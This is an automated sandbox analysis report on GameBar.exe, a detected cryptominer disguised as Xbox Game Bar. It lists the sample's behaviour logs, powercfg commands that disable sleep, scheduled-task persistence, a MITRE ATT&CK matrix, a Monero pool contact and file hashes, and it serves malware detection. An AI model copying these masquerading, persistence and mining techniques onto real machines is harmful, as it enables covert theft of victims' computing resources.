Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\System32\dwm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Windows Management Instrumentation	11 Windows Service	11 Windows Service	123 Masquerading	OS Credential Dumping	531 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Service Execution	Logon Script (Windows)	1 DLL Side-Loading	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	11 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GameBar.exe	51%	ReversingLabs	Win64.Trojan.Barys
GameBar.exe	35%	Virustotal		Browse
GameBar.exe	100%	Avira	TR/AD.Nekark.btvkb

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	100%	Avira	TR/AD.Nekark.btvkb
C:\Windows\Temp\drwozmpbokky.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	51%	ReversingLabs	Win64.Trojan.Barys
C:\Windows\Temp\drwozmpbokky.tmp	44%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.microsof	0%	URL Reputation	safe
http://crl.microsof	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://xmrig.com/docs/algorithms	0%	URL Reputation	safe
http://crl.osofts/Microt0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pool-fr.supportxmr.com	141.94.96.71	true	false		high
pool.supportxmr.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsof	powershell.exe, 0000000D.00000002.459063573.0000016DFE66B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://go.micro	powershell.exe, 0000000D.00000003.401990259.0000016DE7D53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.401990259.0000016DE7B8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.401990259.0000016DE7C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.406923080.0000016DE75A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.401990259.0000016DE7CA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://xmrig.com/docs/algorithms	GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://crl.osofts/Microt0	powershell.exe, 0000000D.00000003.408934816.0000016DFE43F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.429000114.0000016DFE452000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000D.00000002.433252957.0000016DE5F11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.94.96.144	unknown	Germany		680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	873248
Start date and time:	2023-05-23 02:08:59 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	GameBar.exe
Detection:	MAL
Classification:	mal100.spyw.evad.mine.winEXE@80/19@1/1
EGA Information:	Successful, ratio: 25%
HDC Information:	Successful, ratio: 27% (good quality ratio 22.4%) Quality average: 57% Quality standard deviation: 32.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Execution Graph export aborted for target GameBar.exe, PID 7164 because there are no executed function
Execution Graph export aborted for target GameBar.exe, PID 7948 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7344 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:10:05	API Interceptor	2x Sleep call for process: GameBar.exe modified
02:10:07	API Interceptor	129x Sleep call for process: powershell.exe modified
02:10:25	Task Scheduler	Run new task: GameBar path: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
02:11:23	API Interceptor	145x Sleep call for process: conhost.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
